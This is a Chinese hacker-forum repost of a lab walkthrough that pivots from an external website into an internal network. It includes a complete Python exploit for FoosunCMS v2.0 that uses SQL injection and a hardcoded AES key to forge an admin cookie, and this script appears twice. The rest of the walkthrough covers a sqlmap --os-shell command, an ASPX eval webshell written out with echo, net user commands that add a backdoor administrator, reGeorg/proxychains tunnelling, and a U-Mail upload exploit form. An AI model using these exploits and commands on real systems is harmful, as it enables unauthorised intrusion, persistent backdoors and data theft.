跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

一次模拟从外网到内网漫游的实验过程

HACK1949
HACK1949
WEB和服务器安全漏洞

精选回复

发布于


内网漫游拓扑图

1049983-20220124163014501-107379682.jpg

利用登录绕过漏洞进行后台

目标网站ip:192.168.31.55,将目标网站ip绑定到本地hosts文件下的www.test.com下(防止直接访问ip网站加载不全),访问www.test.com得到网站首页,发现是一个html静态网站

1049983-20220124163015017-1310803597.jpg

经过点击发现该网站是FoosunCMS搭建的经过点击发现该网站是FoosunCMS搭建的

1049983-20220124163015355-1295105255.jpg


版本为v2.0,存在可以利用的漏洞,绕过管理员账号信息验证,直接进入后台,可谓是非常危险的一个利用漏洞,访问网站后台地址:/manage/Index.aspx

1049983-20220124163015769-498656470.jpg

搜索发现FoosunCMS v2.0有一个登录绕过漏洞,尝试登录绕过,访问下面链接得到UserNumber

http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin
Image

发现得将UserNumber加密后拼接成cookie即可成功登录

1049983-20220124163016543-935981240.jpg

直接用sql注入拿到UserNumber,然后再与UserName等拼接,构造cookie直接以管理员权限登录,Exp代码如下:

#coding:utf-8
import argparse
import urllib
import traceback
import base64
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
###############################
##search keyword:##
##inurl:/manage/Login.aspx   ##
###############################
KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'
IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'
def parse_args():
  parser = argparse.ArgumentParser()
  parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")
  return parser.parse_args()
def run(url):
  try:
      usernumber = get_usernumber(url)
      if usernumber is not None:
          encrypt_cookie = generate_cookie(usernumber)
          #写入cookie中
          write_cookie(url, encrypt_cookie)
  except Exception:
      traceback.print_exc()
def get_usernumber(url):
  fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"
  content = urllib.urlopen(fullurl).read()
  index = content.index("<option value=\"")
  if  index != -1:
      usernumber = content[index+15:]
      usernumber = usernumber[0: content.index("\"")+1]
      print "Get usernumber success. Usernumber is :", usernumber
      return usernumber
  else:
      print "Get usernumber fail"
      return None
def pkcs7padding(data):
  bs = AES.block_size
  padding = bs - len(data) % bs
  padding_text = chr(padding) * padding
  return data + padding_text
def generate_cookie(usernumber):
  orgstr = "%s,admin,0,1,False"%(usernumber,)
  cryptor = AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16])
  ciphertext = cryptor.encrypt(pkcs7padding(orgstr))
  ciphertext = base64.b64encode(ciphertext)
  return ciphertext
def write_cookie(url, ciphercookie):
  print "Generate Cookie[SITEINFO]:", ciphercookie
  print "Now you can write cookie and access the url: %s/manage/index.aspx"%(url,)
if __name__ == '__main__':
  args = parse_args()
  try:
      if args.url is not None:
          run(args.url[0])
  except Exception, e:
      print "python Foosun_exp.py -u [url]"


执行后成功得到加密的绕过后台登录cookie

1049983-20220124163016987-1666979139.jpg

将脚本打印的加密Cookie用EditThisCookie写入浏览器Cookie

1049983-20220124163017418-921850409.jpg

然后访问http://www.test.com/manage/Index.aspx即可成功进入后台

1049983-20220124163017758-1559793985.jpg

注意:

如果在执行exp脚本的时候出现以下情况,则需要安装python Crypto.Cipher加密包

1049983-20220124163018311-1919009918.jpg

安装加密包

pip install pycryptodome

利用文件上传漏洞获取shell

进入后台后发现控制面板>系统参数设置>上传处可修改上传文件允许格式,在里面加入aspx格式

1049983-20220124163018677-1392734715.jpg


在插件管理>广告系统>添加广告处可上传文件
1049983-20220124163019060-1876193032.jpg
尝试上传aspx一句话脚本发现成功上传

并返回上传后的文件路径
1049983-20220124163019388-1522316222.jpg


利用菜刀成功连接到上传的aspx一句话脚本,但是发现权限不是system权限
1049983-20220124163019771-796133779.jpg


尝试利用sqlmap获取交互shell

将上面发现的注入点放进sqlmap跑一下
http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin
利用sqlmap获得交互shell
sqlmap.py -u"http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin" --os-shell
1049983-20220124163020177-1115874193.jpg

成功获得交互shell并且是system权限
1049983-20220124163020662-1697720747.jpg
利用sqlmap尝试写入一句话木马(补充:注意转义问题
1049983-20220124163021110-559951331.jpg
利用菜刀成功连接
1049983-20220124163021491-689103064.jpg

尝试添加用户失败,显示密码不满足密码策略组要求复杂性太低
加强密码复杂性,再次添加用户发现命令执行成功
将添加的用户加入到管理员组
1049983-20220124163021892-2122734201.jpg


利用Sqlmap交互shell发现该主机ip为192.168.1.123,而不是我们所访问的192.168.31.55。那么有可能是利用了端口转发把不在同一网段的ip转发到了同一网段
1049983-20220124163022331-232925354.jpg



设置代理对另一内网进行渗透

内网漫游

通过查看发现其开启了3389端口,利用前面添加的管理员账号密码远程登录3389,发现在administrator管理员用户下桌面上有一个记事本发现了两个账号密码

1049983-20220124163022706-1917999892.jpg


利用发现的账号登录www.test.com:8080端口的路由界面发现限制了ip登录,我们猜测可能是设置了只能内网ip登录
1049983-20220124163023066-1305831807.jpg


然后我们在本地设置代理后成功登录,发现是个内网路由网站,登录路由后发现该路由器下还有一个172.19.23.123的网站
1049983-20220124163023476-555756649.jpg


这里我们利用kali里的reGeorge+proxychains代理来进行内网渗透,首先设置proxychains的配置文件,打开kali终端输入以下命令,并将dynamic_chain前面的注释符#去掉
vi /etc/proxychains.conf
1049983-20220124163023914-96486084.jpg

设置端口
设置好以后保存退出,切换到reGeorg-master文件下
打通代理隧道,返回下面页面则表示代理成功
python reGeorgSocksProxy.py -p 2333 -l 0.0.0.0 -u http://www.test.com/files/tunnel.aspx

1049983-20220124163024357-312307687.jpg



使用代理打开Firefox浏览器,注:命令前面加proxychains => 使用代理执行该命令
proxychains firefox

1049983-20220124163024828-731229257.jpg


利用上面我们发现的账号密码成功登录该网站
1049983-20220124163025329-1000366990.jpg

发现这个网站是一个u-mailCMS,我们发现u-mail爆发过一个很严重的文件上传漏洞,可以尝试一下这个网站是否修复了这个漏洞,Exp代码如下:
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<FORM name=form1 method=post action="http://172.19.23.123/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data>
ʏԫτݾú<input type="file" name="Filedata" size="30">
<INPUT type=submit value=ʏԫ name=Submit>

使用代理打开构造的html页面,然后上传一个后缀为jpg的php大马

1049983-20220124163025694-1395810906.jpg


上传成功后回显出文件file_id信息
1049983-20220124163026013-1547285053.jpg

利用下面payload获取到当前登录的user_id为3
http://172.19.23.123/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=xgk
1049983-20220124163026402-1928927732.jpg

利用爆出来的user_id和file_id构造出上传的大马文件路径,并利用PHP解析漏洞,路径后面加/.php成功解析
1049983-20220124163026825-842046948.jpg


总结

1.访问目标系统的WEB端口,然后通过在线指纹识别查询目标系统的CMS系统为FoosunCMS,该网站存在历史漏洞后台注入漏洞,且版本为v2.0
http://www.test.com
2.访问以下地址,可获得管理员的UserNumber
http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin
3。直接访问后台页面
http://www.test.com/manage/Index.aspx
4.直接用sql注入拿到UserNumber,然后再与UserName等拼接,构造cookie直接以管理员权限登录,Exp代码如下:
#coding:utf-8
import argparse
import urllib
import traceback
import base64
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
###############################
##search keyword:##
##inurl:/manage/Login.aspx   ##
###############################
KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'
IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'
def parse_args():
  parser = argparse.ArgumentParser()
  parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")
  return parser.parse_args()
def run(url):
  try:
      usernumber = get_usernumber(url)
      if usernumber is not None:
          encrypt_cookie = generate_cookie(usernumber)
          #写入cookie中
          write_cookie(url, encrypt_cookie)
  except Exception:
      traceback.print_exc()
def get_usernumber(url):
  fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"
  content = urllib.urlopen(fullurl).read()
  index = content.index("<option value=\"")
  if  index != -1:
      usernumber = content[index+15:]
      usernumber = usernumber[0: content.index("\"")+1]
      print "Get usernumber success. Usernumber is :", usernumber
      return usernumber
  else:
      print "Get usernumber fail"
      return None
def pkcs7padding(data):
  bs = AES.block_size
  padding = bs - len(data) % bs
  padding_text = chr(padding) * padding
  return data + padding_text
def generate_cookie(usernumber):
  orgstr = "%s,admin,0,1,False"%(usernumber,)
  cryptor = AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16])
  ciphertext = cryptor.encrypt(pkcs7padding(orgstr))
  ciphertext = base64.b64encode(ciphertext)
  return ciphertext
def write_cookie(url, ciphercookie):
  print "Generate Cookie[SITEINFO]:", ciphercookie
  print "Now you can write cookie and access the url: %s/manage/index.aspx"%(url,)
if __name__ == '__main__':
  args = parse_args()
  try:
      if args.url is not None:
          run(args.url[0])
  except Exception, e:
      print "python Foosun_exp.py -u [url]"


执行后成功得到加密的cookie
访问以下地址,并替换cookie信息,成功登陆到后台
http://www.test.com/manage/login.aspx?urls
5.发现后台后发现控制面板>系统参数设置>上传处可修改上传文件允许格式,在里面加入aspx格式
6.在插件管理>广告系统>添加广告处可直接上传aspx一句话,并返回了的文件路径
7.通过菜刀成功连接到一句话,通过自带的命令终端,发现目标权限不是system权限
8.尝试利用sqlmap获取交互shell,成功获得交互shell并且是system权限,这里的网站路径,可以在菜刀目录查看到
sqlmap.py -u"http://www.test.com/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,UserNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin" --os-shell,写入一句需要对特殊符号的转义进行处理
echo  "<%@ page  language="jscript"%><%eval(request.item["pass"],"unsafe");%'>>"c:\innetpub\wwwrot\d.aspx"
9.通过sqlmap获取交互shell,添加用户,并将用户添加到管理员组
net user dimg  Passw0rd /add
net localgroup  administrators  dimg  /add
10.利用Sqlmap交互shell发现该主机ip为192.168.1.123,而不是我们所访问的192.168.31.55,那么有可能是利用了端口转发把不在同一网段的ip转发到了同一网段
12.通过菜刀功能的文件预览功能,发现桌面上存在一个my iefe的记事本,其内容是mail邮箱的账号和密码以及ikuni的密码
13.通过NAMP扫描目标系统存在8080端口,并访问8080端口,发现无法登录,可能是限制内网IP登录
14.这里通过远程桌面登录到www.test.com系统上。其中对应的外网IP地址为www.test.com, 映射的内网IP地址为192.168.1.123
15.这里也可以通过上线CS,并开启socks4代理,通过代理访问http://www.test.com:8080,成功登录后台,发现还有一个网段172.19.23.0/24
16.将eGeorg-master文件下tunnel.aspx通过菜刀上传到目标系统中,并进行访问
17.在攻击机下执行以下命令启动代理成功
python reGeorgSocksProxy.py -p 2333 -l 0.0.0.0 -u http://www.test.com/files/tunnel.aspx
18,在攻击机下
vi /etc/proxychains.conf
127.0.0.1 2333
20.使用NMAP加载proxychains 进行端口扫描,发现存在172.19.23.123:80,为MAIL服务
proxychains nmap   172.19.23.0/24
21.通过Firefox浏览器加载proxychains 成功打开http://172.19.23.123:80,通过泄露的用户名和密码可成功登陆
22.发现这个网站是一个u-mailCMS,我们发现u-mail爆发过一个很严重的文件上传漏洞
23.使用代理打开构造的html页面,然后上传一个后缀为jpg的php大马,上传成功后回显出文件file_id信息
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<FORM name=form1 method=post action="http://172.19.23.123/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data>
ʏԫτݾú<input type="file" name="Filedata" size="30">
<INPUT type=submit value=ʏԫ name=Submit>
24.利用下面payload获取到当前登录的user_id为3
http://172.19.23.123/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=xgk
25.利用爆出来的user_id和file_id构造出上传的大马文件路径,并利用PHP解析漏洞,路径后面加/.php成功解析




原文连接:https://blog.csdn.net/weixin_44991517/article/details/91355442




创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。